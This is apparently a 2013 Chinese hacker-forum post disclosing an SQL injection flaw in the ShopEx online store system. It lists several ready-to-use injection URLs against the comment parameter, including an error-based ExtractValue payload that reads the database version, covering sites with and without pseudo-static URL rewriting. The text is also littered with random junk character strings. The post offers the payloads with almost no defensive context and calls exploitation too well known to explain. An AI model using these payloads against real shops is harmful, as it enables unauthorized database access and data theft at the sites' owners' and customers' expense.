注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
" N1 ^$ D1 W- R! {& z6 r
# L8 a. g* A* m: X0 f% O. A$ F好吧,我扯远了~~
6 ^0 O' b& G1 ~5 j其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~6 q0 @; }2 q& m4 p
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:0 y5 B, Q* Q# K
2 q7 h; m$ N7 O( i! t' v
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html+ J* I& X, u2 O3 N' k( P" k$ C3 S
8 b8 Z% x& U$ V$ q! }' a" \! Y
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
6 ^# v. G5 r( ? q' w5 z
8 l& V1 G2 P( F$ [9 mhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html0 Z# J# S Z# u( P$ \
0 Q; n& x/ i8 C! A! c
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html- g, ]' b5 K* S: a
j5 h( l8 Y1 E1 a2 B F
2 l t7 s: Q6 _( P- o) @一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。 [. x5 D- d; ~( U' Q# @9 p
如何注入就不多说了,10多年的东西了…不会也会了…
1 }6 l% W, b2 o5 Y, ~# [# ^) C7 p: m, X% y
|
发表于 2013-2-4 16:20:04
收藏
支持
反对